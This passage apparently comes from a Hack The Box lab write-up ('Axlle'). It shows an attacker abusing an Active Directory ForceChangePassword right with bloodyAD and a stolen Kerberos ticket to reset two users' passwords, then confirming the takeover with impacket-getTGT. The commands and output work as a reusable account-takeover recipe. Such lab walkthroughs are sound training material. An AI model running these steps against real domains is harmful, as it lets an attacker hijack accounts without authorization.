ForcePasswordChange
As discovered from BloodHound, the dallon.matrix user has the transitive ForceChangePassword access to both baz.humphries and jacob.greeny users from a membership to the Web Devs group
Both jacob.greeny and baz.humphries users are part of the Remote Management Users group
Now that I have validated the credential of the dallon.matrix user, and obtained the TGT, I can perform ForceChangePassword remotely
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ echo -e '[realms]\n\n\tAXLLE.HTB = {\n\t\tkdc = mainframe.axlle.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
AXLLE.HTB = {
kdc = mainframe.axlle.htb
}First, I will set up the /etc/krb5.conf file, so that BloodyAD works
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ KRB5CCNAME=dallon.matrix@mainframe.axlle.htb.ccache bloodyAD -d AXLLE.HTB -k --host mainframe.axlle.htb set password jacob.greeny Qwer1234
[+] Password changed successfully!While there are many ways to change the password of a user, I will be using bloodyad with the TGT of the dallon.matrix user to change the password of the jacob.greeny user
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ KRB5CCNAME=dallon.matrix@mainframe.axlle.htb.ccache bloodyAD -d AXLLE.HTB -k --host mainframe.axlle.htb set password baz.humphries Qwer1234
[+] Password changed successfully!I also reset the password of the baz.humphries user too
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-getTGT 'AXLLE.HTB/jacob.greeny@mainframe.axlle.htb' -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: Qwer1234
[*] Saving ticket in jacob.greeny@mainframe.axlle.htb.ccacheValidated
TGT saved for the jacob.greeny account
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-getTGT 'AXLLE.HTB/baz.humphries@mainframe.axlle.htb' -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: Qwer1234
[*] Saving ticket in baz.humphries@mainframe.axlle.htb.ccacheValidated
TGT saved for the baz.humphries account